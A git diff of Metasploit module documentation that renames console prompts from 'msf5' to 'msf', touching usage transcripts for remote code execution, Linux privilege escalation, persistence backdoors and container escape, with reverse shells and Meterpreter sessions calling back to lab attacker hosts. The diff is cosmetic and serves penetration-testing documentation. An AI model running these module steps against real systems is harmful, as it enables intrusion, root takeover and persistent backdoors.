@@ -62,26 +62,26 @@ A successful check of the exploit will look similar to the output shown below: ## Ubuntu 18.04 LTS with VestaCP 0.9.26 ``` -msf5 > use exploit/linux/http/vestacp_exec -msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218 +msf > use exploit/linux/http/vestacp_exec +msf exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218 RHOSTS => 192.168.74.218 -msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11 +msf exploit(linux/http/vestacp_exec) > set USERNAME user11 USERNAME => user11 -msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123 +msf exploit(linux/http/vestacp_exec) > set PASSWORD qwe123 PASSWORD => qwe123 -msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1 +msf exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1 LHOST => 192.168.74.1 -msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1 +msf exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1 SRVHOST => 192.168.74.1 -msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081 +msf exploit(linux/http/vestacp_exec) > set SRVPORT 8081 SRVPORT => 8081 -msf5 exploit(linux/http/vestacp_exec) > run +msf exploit(linux/http/vestacp_exec) > run [*] Exploit running as background job 32. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.74.1:4444 [*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s -msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s +msf exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s [+] 192.168.74.218:21 - Successfully authenticated to the FTP service [+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded. [*] 192.168.74.218:8083 - Retrieving cookie and csrf token values 
@@ -104,7 +104,7 @@ msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload [*] Sending stage (53755 bytes) to 192.168.74.218 [*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300 -msf5 exploit(linux/http/vestacp_exec) > sessions -i 8 +msf exploit(linux/http/vestacp_exec) > sessions -i 8 [*] Starting interaction with 8... meterpreter > shell diff --git a/documentation/modules/exploit/linux/http/webmin_backdoor.md b/documentation/modules/exploit/linux/http/webmin_backdoor.md index 6ae95ce3f7..687edb4575 100644 --- a/documentation/modules/exploit/linux/http/webmin_backdoor.md +++ b/documentation/modules/exploit/linux/http/webmin_backdoor.md @@ -78,7 +78,7 @@ Set this to `true` to override the `check` result during exploitation. ## Usage ``` -msf5 exploit(linux/http/webmin_backdoor) > run +msf exploit(linux/http/webmin_backdoor) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Webmin 1.890 detected @@ -95,9 +95,9 @@ uname -a Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux ^Z Background session 1? [y/N] y -msf5 exploit(linux/http/webmin_backdoor) > set target 1 +msf exploit(linux/http/webmin_backdoor) > set target 1 target => 1 -msf5 exploit(linux/http/webmin_backdoor) > run +msf exploit(linux/http/webmin_backdoor) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Webmin 1.890 detected diff --git a/documentation/modules/exploit/linux/http/webmin_packageup_rce.md b/documentation/modules/exploit/linux/http/webmin_packageup_rce.md index 06fd7b717a..f4704f1c23 100644 --- a/documentation/modules/exploit/linux/http/webmin_packageup_rce.md +++ b/documentation/modules/exploit/linux/http/webmin_packageup_rce.md 
@@ -20,23 +20,23 @@ This module has been tested with [Webmin 1.910](https://sourceforge.net/projects ### Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64 ``` -msf5 > -msf5 > use exploit/linux/http/webmin_packageup_rce -msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9 +msf > +msf > use exploit/linux/http/webmin_packageup_rce +msf exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9 RHOSTS => 192.168.1.9 -msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python +msf exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python PAYLOAD => cmd/unix/reverse_python -msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12 +msf exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12 LHOST => 192.168.1.12 -msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce +msf exploit(linux/http/webmin_packageup_rce) > set USERNAME rce USERNAME => rce -msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password +msf exploit(linux/http/webmin_packageup_rce) > set PASSWORD password PASSWORD => password -msf5 exploit(linux/http/webmin_packageup_rce) > check +msf exploit(linux/http/webmin_packageup_rce) > check [*] NICE! rce has the right to >>Package Update<< [+] 192.168.1.9:10000 - The target is vulnerable. -msf5 exploit(linux/http/webmin_packageup_rce) > exploit +msf exploit(linux/http/webmin_packageup_rce) > exploit [*] Started reverse TCP handler on 192.168.1.12:4444 [+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5 diff --git a/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md b/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md index ceb0ff2a35..4f88bd9c14 100644 --- a/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md +++ b/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md 
@@ -35,14 +35,14 @@ The following devices are known to be affected by this issue: #### Meterpreter ``` -msf5 > use exploit/linux/http/wepresent_cmd_injection -msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246 +msf > use exploit/linux/http/wepresent_cmd_injection +msf exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246 RHOSTS => 10.12.70.246 -msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238 +msf exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238 LHOST => 10.12.70.238 -msf5 exploit(linux/http/wepresent_cmd_injection) > check +msf exploit(linux/http/wepresent_cmd_injection) > check [+] 10.12.70.246:443 - The target is vulnerable. -msf5 exploit(linux/http/wepresent_cmd_injection) > run +msf exploit(linux/http/wepresent_cmd_injection) > run [*] Started reverse TCP handler on 10.12.70.238:4444 [*] Command Stager progress - 9.95% done (127/1276 bytes) 
@@ -69,18 +69,18 @@ Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST #### Busybox/Telnetd Bind Shell ``` -msf5 > use exploit/linux/http/wepresent_cmd_injection -msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0 +msf > use exploit/linux/http/wepresent_cmd_injection +msf exploit(linux/http/wepresent_cmd_injection) > set target 0 target => 0 -msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd +msf exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd payload => cmd/unix/bind_busybox_telnetd -msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246 +msf exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246 RHOSTS => 10.12.70.246 -msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238 +msf exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238 LHOST => 10.12.70.238 -msf5 exploit(linux/http/wepresent_cmd_injection) > check +msf exploit(linux/http/wepresent_cmd_injection) > check [+] 10.12.70.246:443 - The target is vulnerable. -msf5 exploit(linux/http/wepresent_cmd_injection) > run +msf exploit(linux/http/wepresent_cmd_injection) > run [*] Started bind TCP handler against 10.12.70.246:4444 [*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500 diff --git a/documentation/modules/exploit/linux/http/zimbra_xxe_rce.md b/documentation/modules/exploit/linux/http/zimbra_xxe_rce.md index 32c77f26fe..e0dbde29a0 100644 --- a/documentation/modules/exploit/linux/http/zimbra_xxe_rce.md +++ b/documentation/modules/exploit/linux/http/zimbra_xxe_rce.md 
@@ -23,7 +23,7 @@ Zimbra Collaboration Suite v8.5 to v8.7.11. ### Zimbra 8.7.1 GA 1670 FOSS edition Tested on Ubuntu 16.04.6 LTS ``` -msf5 exploit(linux/http/zimbra_xxe_rce) > exploit +msf exploit(linux/http/zimbra_xxe_rce) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Using URL: http://0.0.0.0:8080/2tQ75DxRvaeGRSP diff --git a/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md b/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md index 6889323188..7fcff3830b 100644 --- a/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md +++ b/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md @@ -47,12 +47,12 @@ ### Red Hat Enterprise Linux 7.0 (x64) ``` - msf5 > use exploit/linux/local/abrt_sosreport_priv_esc - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true + msf > use exploit/linux/local/abrt_sosreport_priv_esc + msf exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1 + msf exploit(linux/local/abrt_sosreport_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run + msf exploit(linux/local/abrt_sosreport_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] System is configured to use ABRT for crash reporting 
@@ -85,12 +85,12 @@ ### Red Hat Enterprise Linux 7.1 (x64) ``` - msf5 > use exploit/linux/local/abrt_sosreport_priv_esc - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true + msf > use exploit/linux/local/abrt_sosreport_priv_esc + msf exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1 + msf exploit(linux/local/abrt_sosreport_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run + msf exploit(linux/local/abrt_sosreport_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] System is configured to use ABRT for crash reporting diff --git a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md index a96fe6992f..dfc67df761 100644 --- a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md +++ b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md @@ -79,10 +79,10 @@ The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/mus ## Scenarios ``` - msf5 > use exploit/linux/local/af_packet_chocobo_root_priv_esc - msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1 + msf > use exploit/linux/local/af_packet_chocobo_root_priv_esc + msf exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run + msf exploit(linux/local/af_packet_chocobo_root_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.iDLrwN3S4.c' (24885 bytes) ... [*] Writing '/tmp/.rMIvkKT' (207 bytes) ... diff --git a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md index 1314da491b..badf782bba 100644 
--- a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md +++ b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md @@ -65,10 +65,10 @@ ## Scenarios ``` - msf5 > use exploit/linux/local/af_packet_packet_set_ring_priv_esc - msf5 exploit(linux/local/af_packet_packet_set_ring_priv_esc) > set session 1 + msf > use exploit/linux/local/af_packet_packet_set_ring_priv_esc + msf exploit(linux/local/af_packet_packet_set_ring_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/af_packet_packet_set_ring_priv_esc) > run + msf exploit(linux/local/af_packet_packet_set_ring_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.ZxgWSP2O1.c' (19378 bytes) ... diff --git a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md index d2beec8e8b..3d3f78b491 100644 --- a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md +++ b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md 
@@ -34,33 +34,33 @@ Writable directory for backdoor default is (/usr/local/bin/) ### Tested on Ubuntu 18.04.2 LTS ``` -msf5 > use exploit/linux/local/apt_package_manager_persistence -msf5 exploit(linux/local/apt_package_manager_persistence) > handler -p linux/x86/meterpreter/reverse_tcp -H 172.22.222.136 -P 4444 +msf > use exploit/linux/local/apt_package_manager_persistence +msf exploit(linux/local/apt_package_manager_persistence) > handler -p linux/x86/meterpreter/reverse_tcp -H 172.22.222.136 -P 4444 [*] Payload handler running as background job 0. -msf5 exploit(linux/local/apt_package_manager_persistence) > +msf exploit(linux/local/apt_package_manager_persistence) > [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Sending stage (985320 bytes) to 172.22.222.130 [*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60526) at 2019-04-26 13:04:33 -0500 -msf5 exploit(linux/local/apt_package_manager_persistence) > set session 1 +msf exploit(linux/local/apt_package_manager_persistence) > set session 1 session => 1 -msf5 exploit(linux/local/apt_package_manager_persistence) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(linux/local/apt_package_manager_persistence) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(linux/local/apt_package_manager_persistence) > set lhost 172.22.222.136 +msf exploit(linux/local/apt_package_manager_persistence) > set lhost 172.22.222.136 lhost => 172.22.222.136 -msf5 exploit(linux/local/apt_package_manager_persistence) > set lport 4444 +msf exploit(linux/local/apt_package_manager_persistence) > set lport 4444 lport => 4444 -msf5 exploit(linux/local/apt_package_manager_persistence) > exploit +msf exploit(linux/local/apt_package_manager_persistence) > exploit [*] Attempting to write hook: [*] Wrote /etc/apt/apt.conf.d/34bmUIzfd [*] Backdoor uploaded /usr/local/bin/dbmqKeh6U9 [*] Backdoor will run on next APT update -msf5 
exploit(linux/local/apt_package_manager_persistence) > +msf exploit(linux/local/apt_package_manager_persistence) > [*] Sending stage (985320 bytes) to 172.22.222.130 [*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.130:60528) at 2019-04-26 13:05:17 -0500 -msf5 exploit(linux/local/apt_package_manager_persistence) > +msf exploit(linux/local/apt_package_manager_persistence) > ``` Note: Second session comes in after running `apt update` on the remote host diff --git a/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md b/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md index f8b5c34c6f..0fee4f44f7 100644 --- a/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md +++ b/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md @@ -64,14 +64,14 @@ ### Command Shell Session (Linux Mint 19) ``` - msf5 > use exploit/linux/local/asan_suid_executable_priv_esc - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out + msf > use exploit/linux/local/asan_suid_executable_priv_esc + msf exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out suid_executable => /usr/bin/a.out - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1 + msf exploit(linux/local/asan_suid_executable_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true + msf exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run + msf exploit(linux/local/asan_suid_executable_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] /usr/bin/a.out is setuid 
@@ -120,14 +120,14 @@ ### Meterpreter Session (Linux Mint 19) ``` - msf5 > use exploit/linux/local/asan_suid_executable_priv_esc - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1 + msf > use exploit/linux/local/asan_suid_executable_priv_esc + msf exploit(linux/local/asan_suid_executable_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out + msf exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out suid_executable => /usr/bin/a.out - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true + msf exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run + msf exploit(linux/local/asan_suid_executable_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] /usr/bin/a.out is setuid diff --git a/documentation/modules/exploit/linux/local/bash_profile_persistence.md b/documentation/modules/exploit/linux/local/bash_profile_persistence.md index c591fb6286..69085dc08e 100644 --- a/documentation/modules/exploit/linux/local/bash_profile_persistence.md +++ b/documentation/modules/exploit/linux/local/bash_profile_persistence.md @@ -35,9 +35,9 @@ ## Scenarios ``` -msf5 > use exploit/linux/local/bash_profile_persistence -msf5 exploit(linux/local/bash_profile_persistence) > set SESSION 1 -msf5 exploit(linux/local/bash_profile_persistence) > exploit +msf > use exploit/linux/local/bash_profile_persistence +msf exploit(linux/local/bash_profile_persistence) > set SESSION 1 +msf exploit(linux/local/bash_profile_persistence) > exploit [*] Bash profile exists: /home/user/.bashrc [*] Bash profile is writable: /home/user/.bashrc 
diff --git a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md index 6af9f291bc..23848c9dd5 100644 --- a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md +++ b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md @@ -57,14 +57,14 @@ ## Scenarios ``` - msf5 > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc - msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1 + msf > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc + msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run + msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.DKJWL0TG7sm0M5' (249 bytes) ... diff --git a/documentation/modules/exploit/linux/local/bpf_priv_esc.md b/documentation/modules/exploit/linux/local/bpf_priv_esc.md index 40cfc7bfc0..6109907adb 100644 --- a/documentation/modules/exploit/linux/local/bpf_priv_esc.md +++ b/documentation/modules/exploit/linux/local/bpf_priv_esc.md 
@@ -73,14 +73,14 @@ There are a few requirements for this module to work: In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system. ``` - msf5 > use exploit/linux/local/bpf_priv_esc - msf5 exploit(linux/local/bpf_priv_esc) > set session 1 + msf > use exploit/linux/local/bpf_priv_esc + msf exploit(linux/local/bpf_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/bpf_priv_esc) > set verbose true + msf exploit(linux/local/bpf_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/bpf_priv_esc) > run + msf exploit(linux/local/bpf_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] Kernel version 4.4.0-21-generic appears to be vulnerable diff --git a/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md b/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md index ab3870ebd2..dc521c59e2 100644 --- a/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md +++ b/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md 
@@ -162,12 +162,12 @@ It is possible to force pre-compiled binaries, in a scenario where `build-essent ### Debian 9.0 (x86_64) ``` - msf5 > use exploit/linux/local/bpf_sign_extension_priv_esc - msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1 + msf > use exploit/linux/local/bpf_sign_extension_priv_esc + msf exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set compile False + msf exploit(linux/local/bpf_sign_extension_priv_esc) > set compile False compile => False - msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run + msf exploit(linux/local/bpf_sign_extension_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.JBJBxoEO' (34784 bytes) ... diff --git a/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md b/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md index 4c0568d9f9..40c802eecf 100644 --- a/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md +++ b/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md @@ -7,7 +7,7 @@ It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 ## Scenarios ``` -msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run +msf exploit(linux/local/cpi_runrshell_priv_esc) > run [*] Started reverse TCP handler on 192.168.0.21:4444 [*] Uploading /tmp/mYVrqmsETa.bin diff --git a/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md b/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md index 075d75602c..e638123992 100644 --- a/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md +++ b/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md 
@@ -32,17 +32,17 @@ ### Linux Mint 19 (x64) ``` - msf5 > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc - msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1 + msf > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc + msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true + msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check + msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check [*] Executing id ... uid=0(root) gid=0(root) groups=0(root),1001(test) [+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'. - msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run + msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Executing id ... diff --git a/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md b/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md index 13bcef4afc..b81e018187 100644 --- a/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md +++ b/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md 
@@ -65,10 +65,10 @@ A directory where we can write files on the host (default is /tmp). This is need ## Container Escape starting with a meterpreter shell ``` -msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape -msf5 exploit(linux/local/lxc_privilege_escalation) > set session 1 +msf exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape +msf exploit(linux/local/lxc_privilege_escalation) > set session 1 session => 1 -msf5 exploit(linux/local/lxc_privilege_escalation) > run +msf exploit(linux/local/lxc_privilege_escalation) > run [*] Started reverse TCP handler on 10.0.2.15:4444 [*] Writing payload executable to '/tmp/aLQdBKpMXLo' diff --git a/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md b/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md index 6a84a2c0dc..c1e7b6827f 100644 --- a/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md +++ b/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md 
@@ -56,20 +56,20 @@ meterpreter > getuid Server username: uid=1000, gid=1000, euid=1000, egid=1000 meterpreter > Background session 1? [y/N] -msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1 +msf exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1 session => 1 -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50 +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50 lhost => 192.168.0.50 -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lport 13371 +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set lport 13371 lport => 13371 -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set EXIMPATH /usr/exim/bin/exim +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set EXIMPATH /usr/exim/bin/exim EXIMPATH => /usr/exim/bin/exim -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check +msf exploit(linux/local/exim4_deliver_message_priv_esc) > check [*] The target appears to be vulnerable. -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit +msf exploit(linux/local/exim4_deliver_message_priv_esc) > exploit [*] Started reverse TCP handler on 192.168.0.50:13371 [*] Payload sent, wait a few seconds... diff --git a/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md index d5caa3eeda..12576f63e3 100644 --- a/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md 
+++ b/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md @@ -53,10 +53,10 @@ ## Scenarios ``` - msf5 > use exploit/linux/local/glibc_realpath_priv_esc - msf5 exploit(linux/local/glibc_realpath_priv_esc) > set session 1 + msf > use exploit/linux/local/glibc_realpath_priv_esc + msf exploit(linux/local/glibc_realpath_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/glibc_realpath_priv_esc) > run + msf exploit(linux/local/glibc_realpath_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.DhRxy0FQR.c' (35470 bytes) ... diff --git a/documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md b/documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md index 979e3f6772..ee8d99c254 100644 --- a/documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md +++ b/documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md @@ -175,7 +175,7 @@ Path to the `xglance-bin` executable. Default is `/opt/perf/bin/xglance-bin`. [*] Auxiliary module execution completed ``` ``` - msf5 exploit(linux/local/hp_xglance_priv_esc) > rexploit + msf exploit(linux/local/hp_xglance_priv_esc) > rexploit [*] Reloading module... [!] SESSION may not be compatible with this module. diff --git a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md index 2ce5b01541..933be480ed 100644 --- a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md 
@@ -43,21 +43,21 @@ ### ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64) ``` - msf5 > use exploit/linux/local/ktsuss_suid_priv_esc - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 + msf > use exploit/linux/local/ktsuss_suid_priv_esc + msf exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true + msf exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check + msf exploit(linux/local/ktsuss_suid_priv_esc) > check [+] /usr/bin/ktsuss is setuid [*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test) [+] The target is vulnerable. - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/ktsuss_suid_priv_esc) > 